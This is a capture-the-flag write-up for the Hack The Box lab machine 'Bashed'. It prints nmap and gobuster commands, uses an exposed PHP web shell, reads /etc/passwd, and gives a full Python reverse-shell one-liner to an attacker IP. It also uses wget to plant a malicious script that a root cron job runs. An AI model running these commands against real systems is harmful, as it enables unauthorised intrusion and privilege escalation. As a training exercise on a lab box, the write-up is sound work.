Sounds like BASH script!!!
The hint in any HTB is the name of the box itself. In this box something to do with the bash command or script to get access to the system.
Let’s begin with recon.
Start with basic nmap scan.
nmap -sC -sV -O -oA nmap/basic 10.10.10.68
- -sC: Default nmap script
- -sV: Service/version info
- -O: Enable OS detection
- -oA: Output scan results in 3 different formats
We have the following results:
- Port 80 — Running Apache httpd 2.4.18 (Ubuntu)
Next, run the full nmap scan.
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.68
- p-: Scan all ports from 1–65535
Again we get back the same result as above, only port 80 is open.
For this write-up, I got rooted while the UDP scan is still running. So I didn’t provide UDP scan result.
Port 80 Apache httpd 2.4.18 (Ubuntu)
Since we only have port 80 is open and web service is running on this port, let’s run gobuster in the background and access to the page.
gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -f
- -u: Target URL
- -w: Custom wordlist
- -f: Append / to each request
Let’s click the red arrow.
This page says the developer for this site using a PHP script to run bash command and it is in this server. Hint!!!
Click the GitHub link and we found these 2 scripts.
After I analysed these 2 scripts, it uses the shell_exec function to run system commands in the target machine as a web shell. We will see if this is useful in the exploitation phase.
Next, our gobuster results return us below results:
After enumerating all the directory above, /dev directory gives what we are looking for. The phpbash.php and phpbash.min.php scripts that we found in the GitHub repo.
Great! Both scripts are able to execute the bash command. We can use any one of this to leverage in the exploitation phase.
First, we check the id and sudo privilege of the user.
Now, we know this user can use sudo to run all command without password (nopasswd) for user scriptmanager. You can refer here for nopasswd topic.
Next, check /etc/passwd file for any other user in the system using below command.
cat /etc/passwd | grep -v false | grep -v nologin
- -v false: Grep all except the line that contains string “false”
- -v nologin: Grep all except the line that contains string “nologin”
We are only looking for users that have an interactive shell.
Let’s enumerate scriptmanager home directory for any interesting info.
The directory is empty. Let’s find files that are owned by scriptmanager using find command.
find / -user scriptmanager | head
- /: Search in entire root “/” directory
- -user: File is owned by user user
- head: — Print first 10 lines of files
We got the following result:
Let’s enumerate the /script directory.
Remember when you want to run a command as another user you need to use sudo -u <username> <command>
Type below command in web shell:
sudo -u scriptmanager ls -l /scripts
- -u: Run command as another user
- ls -l: List files in the directory
Look at the creation dates of the files. The test.py created in the system in Dec whereas the test.txt is created most recently. Check the content of the test.py files, it creates a test.txt file with root permission.
I also observed the time of the test.txt is changing for every 1 minute. This immediately triggers me, there is a scheduled job run by root for every 1 minute.
Next, since scriptmanager able to run test.py which is a pythons script, we can use python onliner reverse shell via this web shell to get a reverse shell to our Kali Linux.
Set up a netcat listener on port 4444 in your Kali Linux.
nc -nlvp 4444
And run below command in the web shell. This onliner command can be found in pentestmonkey site.
sudo -u scriptmanager python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.21",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
We got a reverse shell now.
Now, we know that the test.py script is run by the root. We need to create test.py in our Kali Linux with same python reverse shell onliner as we did above and transfer to the target system (Bashed box). The only thing you need to do is change the port number. In my case, I use port 4445. Why we are doing this? Because the script will be run by the root. Anything run by the root we can leverage for privilege escalation.
Save the file and fire python simple web server.
From the previous shell, backup the existing test.py file.
download test.py file to /scripts directory using below command:
cd /scripts/; wget http://10.10.14.21:8000/test.py
Now, set up a netcat listener in your Kali Linux on port 4445.
nc -nlvp 4445
We got root shell.
Grab the root flag.
Grab the user flag.
Attack Strategy Map
Thank you for reading :-) Next box is Nibbles.